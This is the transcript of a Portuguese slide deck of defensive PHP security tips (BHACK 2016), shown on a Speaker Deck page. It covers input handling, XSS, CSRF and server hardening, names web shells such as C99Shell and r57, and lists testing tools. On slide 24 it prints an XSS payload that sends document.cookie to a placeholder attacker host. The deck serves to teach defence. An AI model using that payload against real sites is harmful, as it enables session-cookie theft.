Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Dicas de segurança para o PHP e seus amigos

Joubert RedRat
November 18, 2016
Technology
0
26

Dicas de segurança para o PHP e seus amigos

Joubert RedRat

November 18, 2016
Tweet

More Decks by Joubert RedRat

See All by Joubert RedRat
Retome o controle do seu analytics com Matomo
joubertredrat
0
24
#tbt do PHP, a evolução da linguagem nos últimos 30 anos
joubertredrat
0
26
DevBox, o meu pequeno projeto open source para o dia a dia do dev
joubertredrat
0
25
O poder do Object Calisthenics no PHP
joubertredrat
0
99
Playing with Docker and Docker Compose
joubertredrat
0
120
Why migrate your application to microservices?
joubertredrat
0
18
Por que migrar sua aplicação para Microserviços?
joubertredrat
0
25
Uso prático de fakes para mocks no Golang
joubertredrat
0
79
Brincando com comandos no Golang
joubertredrat
0
170

Other Decks in Technology

See All in Technology
痒い所に手が届く!要約モデルのつくり方
sakusakumura
0
200
Agent Mode とは?GitHub Copilot の新機能を探る
lescoggi
1
140
組織のスケールを見据えたプロジェクトリードエンジニア制度の実践 / Project Lead Engineer for Scaling Engineering Organization
ohbarye
9
2.6k
eBPF-based Process Lifecycle Monitoring
yukinakanaka
1
140
一歩ずつ成長しながら進める ZOZOの基幹システムリプレイス/Growing Stap by Stap ZOZO BackOffice System Replacement
cocet33000
3
1.2k
実践的なバグバウンティ入門 (2025年版)
scgajge12
4
850
越境するプロダクトエンジニアリング
liaoziyang
0
170
プロダクトの一番の理解者を目指してQAが取り組んでいること 〜現場・マネジメント各視点のプラクティス〜
hacomono
PRO
0
130
AI活用の壁を超える! 開発組織への普及の秘訣
kouryou
0
380
PHPでアクターモデルを活用したSagaパターンの実践法 / php-saga-pattern-with-actor-model
ytake
0
160
【Oracle Cloud ウェビナー】【入門&再入門】はじめてのOracle Cloud Infrastructure [+最新情報]
oracle4engineer
PRO
2
350
生成AIで生産性向上
tomuro
0
180

Featured

See All Featured
GraphQLとの向き合い方2022年版
quramy
44
14k
Design and Strategy: How to Deal with People Who Don’t "Get" Design
morganepeng
129
19k
Bootstrapping a Software Product
garrettdimon
PRO
307
110k
Why Our Code Smells
bkeepers
PRO
336
57k
jQuery: Nuts, Bolts and Bling
dougneiner
63
7.7k
Gamification - CAS2011
davidbonilla
80
5.2k
Understanding Cognitive Biases in Performance Measurement
bluesmoon
27
1.6k
A better future with KSS
kneath
238
17k
The Art of Delivering Value - GDevCon NA Keynote
reverentgeek
11
1.4k
The Success of Rails: Ensuring Growth for the Next 100 Years
eileencodes
44
7.1k
Rebuilding a faster, lazier Slack
samanthasiow
80
8.9k
10 Git Anti Patterns You Should be Aware of
lemiorhan
PRO
656
59k

Transcript

  1. Dicas de segurança para o PHP e seus amigos BHACK

    2016 – SEGURANÇA TI CONHECIMENTO

  2. Eu? Sou este ai https://github.com/joubertredrat https://br.linkedin.com/in/joubertredrat https://twitter.com/joubertredrat http://www.vivaolinux.com.br/~joubertredrat * no

    meu Linkedin explica o porque do apelido RedRat https://creativecommons.org/licenses/by-sa/4.0/ Dicas de segurança para o PHP e seus amigos

  3. Dicas de segurança para o PHP e seus amigos INFORMAÇÃO

    É PODER QUEM TEM INFORMAÇÃO DOMINA O MUNDO

  4. Dicas de segurança para o PHP e seus amigos 1ª

    DICA REMOVER INFORMAÇÕES DESNECESSÁRIAS

  5. Dicas de segurança para o PHP e seus amigos 1ª

    DICA - REMOVER INFORMAÇÕES DESNECESSÁRIAS

  6. Dicas de segurança para o PHP e seus amigos 1ª

    DICA - REMOVER INFORMAÇÕES DESNECESSÁRIAS

  7. Dicas de segurança para o PHP e seus amigos 2ª

    DICA ISOLAR SUAS APLICAÇÕES, SITES OU SISTEMAS

  8. Dicas de segurança para o PHP e seus amigos 2ª

    DICA - ISOLAR SUAS APLICAÇÕES, SITES OU SISTEMAS

  9. Dicas de segurança para o PHP e seus amigos 3ª

    DICA DESABILITAR OU EVITAR RECURSOS EXTERNOS

  10. Dicas de segurança para o PHP e seus amigos 3ª

    DICA - DESABILITAR OU EVITAR RECURSOS EXTERNOS R57 R6 C99Shell C100Shell bypass Tool25 b374k GaZa

  11. Dicas de segurança para o PHP e seus amigos 3ª

    DICA - DESABILITAR OU EVITAR RECURSOS EXTERNOS http://php.net/allow-url-include

  12. Dicas de segurança para o PHP e seus amigos 4ª

    DICA USAR URL AMIGÁVEIS E EVITAR QUERY STRING

  13. Dicas de segurança para o PHP e seus amigos 4ª

    DICA - USAR URL AMIGÁVEIS E EVITAR QUERY STRING

  14. Dicas de segurança para o PHP e seus amigos 5ª

    DICA TRATAR OS DADOS VINDOS DO USUÁRIO MESMO ASSIM QUER USAR QUERY STRING? 4ª DICA - USAR URL AMIGÁVEIS E EVITAR QUERY STRING

  15. Dicas de segurança para o PHP e seus amigos 5ª

    DICA - TRATAR OS DADOS VINDOS DO USUÁRIO filter_var mysqli_stmt_bind_param PDOStatement::bindValue DateTime::getLastErrors(); is_(bool,callable,numeric,float,string,object,etc) Libs no Packagist

  16. Dicas de segurança para o PHP e seus amigos 5ª

    DICA - TRATAR OS DADOS VINDOS DO USUÁRIO Quer fazer testes? sqlmap Zed Attack Proxy “ZAP” BeEF sqlninja

  17. Dicas de segurança para o PHP e seus amigos 6ª

    DICA EVITAR O USO DA PRIMARY KEY OU ID

  18. Dicas de segurança para o PHP e seus amigos 6ª

    DICA - EVITAR O USO DA PRIMARY KEY OU ID • UUID • GUID • MD5/CRC32/SHA1/SHA256 • Hash ou Ofuscamento

  19. Dicas de segurança para o PHP e seus amigos 6ª

    DICA - EVITAR O USO DA PRIMARY KEY OU ID

  20. Dicas de segurança para o PHP e seus amigos 7ª

    DICA (PRIMA DA 5ª DICA) CROSS-SITE SCRIPTING

  21. Dicas de segurança para o PHP e seus amigos 7ª

    DICA - CROSS-SITE SCRIPTING

  22. Dicas de segurança para o PHP e seus amigos 7ª

    DICA - CROSS-SITE SCRIPTING

  23. Dicas de segurança para o PHP e seus amigos 7ª

    DICA - CROSS-SITE SCRIPTING

  24. Dicas de segurança para o PHP e seus amigos 7ª

    DICA - CROSS-SITE SCRIPTING results.php?q=<script>window.open("http://site.do.mal/get.php?cookie=" + document.cookie, "_blank");</script>

  25. Dicas de segurança para o PHP e seus amigos 8ª

    DICA CROSS SITE REQUEST FORGERY

  26. Dicas de segurança para o PHP e seus amigos 8ª

    DICA - CROSS SITE REQUEST FORGERY

  27. Dicas de segurança para o PHP e seus amigos 9ª

    DICA USAR CHECKSUM OU O VCS AO SEU FAVOR

  28. Dicas de segurança para o PHP e seus amigos 9ª

    DICA - USAR CHECKSUM OU O VCS AO SEU FAVOR

  29. Dicas de segurança para o PHP e seus amigos ACABOU

    AS DICAS POR HOJE PERGUNTAS? FALA QUE NÃO TEM 